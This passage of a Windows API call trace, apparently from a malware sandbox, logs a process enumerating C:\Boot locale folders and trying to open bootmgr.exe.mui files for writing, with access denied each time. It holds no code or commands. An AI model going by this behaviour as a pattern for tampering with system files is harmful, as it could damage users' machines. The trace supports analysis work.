dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.332] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0084.332] FindFirstFileExW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0084.332] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.332] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.333] AreFileApisANSI () returned 1 [0084.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.334] AreFileApisANSI () returned 1 [0084.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0084.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 35 [0084.334] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.334] GetFileType (hFile=0x348) returned 0x1 [0084.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0084.334] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.334] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.334] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.335] CloseHandle (hObject=0x348) returned 1 [0084.335] AreFileApisANSI () returned 1 [0084.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0084.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 35 [0084.335] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.335] GetLastError () returned 0x5 [0084.335] GetLastError () returned 0x5 [0084.335] SetLastError (dwErrCode=0x5) [0084.335] GetLastError () returned 0x5 [0084.335] SetLastError (dwErrCode=0x5) [0084.335] GetLastError () returned 0x5 [0084.335] SetLastError (dwErrCode=0x5) [0084.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0084.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0084.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.335] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x44, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6dc68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x44, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ⵠ\x01⺊Ā")) returned 0 [0084.335] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0084.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0084.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.470] AreFileApisANSI () returned 1 [0084.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE", lpUsedDefaultChar=0x0) returned 14 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.471] AreFileApisANSI () returned 1 [0084.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sv-SE") returned 14 [0084.471] CreateFileW (lpFileName="C:\\Boot\\sv-SE" (normalized: "c:\\boot\\sv-se"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.471] GetLastError () returned 0x5 [0084.471] GetLastError () returned 0x5 [0084.471] SetLastError (dwErrCode=0x5) [0084.471] GetLastError () returned 0x5 [0084.471] SetLastError (dwErrCode=0x5) [0084.471] GetLastError () returned 0x5 [0084.471] SetLastError (dwErrCode=0x5) [0084.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.471] AreFileApisANSI () returned 1 [0084.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sv-SE") returned 14 [0084.471] CreateFileW (lpFileName="C:\\Boot\\sv-SE" (normalized: "c:\\boot\\sv-se"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.472] GetLastError () returned 0x5 [0084.472] GetLastError () returned 0x5 [0084.472] SetLastError (dwErrCode=0x5) [0084.472] GetLastError () returned 0x5 [0084.472] SetLastError (dwErrCode=0x5) [0084.472] GetLastError () returned 0x5 [0084.472] SetLastError (dwErrCode=0x5) [0084.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.472] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.472] FindFirstFileExW (in: lpFileName="C:\\Boot\\sv-SE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0084.472] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.472] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.473] AreFileApisANSI () returned 1 [0084.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.474] RtlAllocateHeap 